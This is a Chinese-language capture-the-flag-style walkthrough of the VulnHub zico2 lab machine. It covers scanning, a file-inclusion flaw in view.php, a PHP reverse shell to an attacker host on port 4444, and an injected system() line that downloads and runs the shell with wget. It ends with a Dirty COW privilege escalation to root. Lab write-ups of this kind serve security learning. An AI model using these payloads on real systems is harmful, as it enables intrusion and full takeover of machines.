kali滲透綜合靶機(五)--zico2靶機


kali滲透綜合靶機(五)--zico2靶機

靶機地址:https://www.vulnhub.com/series/zico2,137/#modal210download

一、主機發現

1.netdiscover -i eth0 -r 192.168.10.0/24

  

二、端口掃描

1.masscan --rate=10000 -p 0-65535 192.168.10.158

  

三、端口服務識別

1. nmap -sV -T4 -O 192.168.10.157 -p 22,80,111,60830

  

四、漏洞發現

1.訪問http://192.168.10.158,發現http://192.168.10.158/view.php?page=tools.htm可能存在文件包含漏洞

  

2.測試是否存在文件包含漏洞,下圖說明存在存在文件包含漏洞

  

3.掃描網站目錄

dirb http://192.168.10.158

  

4.測試數據庫是否可寫內容,在數據庫插入<? Phpinfo();?>,然后結合文件包含

  

然后結合文件包含

  

5.在攻擊端寫反彈腳本,然后在目標數據庫中寫入一段代碼加載位於攻擊端的代碼,結合文件包含,然后在攻擊端開啟監聽

攻擊端代碼:

<?php

$sock=fsockopen("192.168.10.151",4444);exec("/bin/sh -i <&3 >&3 2>&3");

?>

目標數據庫插入代碼:

<?php system("wget 192.168.10.151/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>

  

  

  

6.新建一個終端

python -c 'import pty;pty.spawn("/bin/bash")'

  

7.下載攻擊端的dirty.c腳本

  

8. 然后編譯並運行,然后切換firefart賬戶,獲得管理員權限

  

 

總結:

1.信息收集

2.文件包含

3.臟牛提權


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM